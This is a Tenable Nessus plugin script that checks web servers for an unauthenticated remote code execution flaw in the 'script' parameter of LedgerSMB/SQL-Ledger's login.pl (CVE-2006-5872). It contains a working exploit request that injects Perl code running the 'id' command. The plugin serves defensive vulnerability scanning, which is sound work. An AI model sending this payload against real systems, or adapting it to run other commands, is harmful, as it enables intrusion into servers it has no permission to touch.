#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a Perl application that allows
arbitrary command execution. 

Description :

The remote host is running LedgerSMB or SQL-Ledger, a web-based
double-entry accounting system. 

The version of LedgerSMB or SQL-Ledger on the remote host fails to
sanitize user-supplied input to the 'script' parameter of the
'login.pl' script before using it to execute Perl code.  An
unauthenticated attacker can leverage this issue to execute arbitrary
code on the remote host subject to the privileges of the web server
user id. 

See also :

http://www.securityfocus.com/archive/1/458300/30/0/threaded

Solution :

Upgrade to LedgerSMB 1.1.5 / SQL-Ledger 2.6.21 or later as those
versions reportedly address the issue. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(24262);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2006-5872");
  script_bugtraq_id(21634);

  script_name(english:"LedgerSMB / SQL-Ledger script Parameter Arbitrary Command Execution Vulnerability");
  script_summary(english:"Tries to run a command via LedgerSMB/SQL-Ledger login.pl");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Loop through directories.
if (thorough_tests) extra_dirs = make_list("/ledger", "/sql-ledger", "/ledger-smb", "/ledgersmb");
else extra_dirs = make_list();

exploit = string(
  "/login.pl?",
  "login=", SCRIPT_NAME, "&",
  "script=", urlencode(str:'-e print "Content-Type: text/plain\r\n\r\n";system(id)'), "&",
  "action=logout"
);

http_check_remote_code(
  extra_dirs:extra_dirs,
  check_request:exploit,
  check_result:"uid=[0-9]+.*gid=[0-9]+.*",
  command:"id",
  description:desc,
  port:port
);
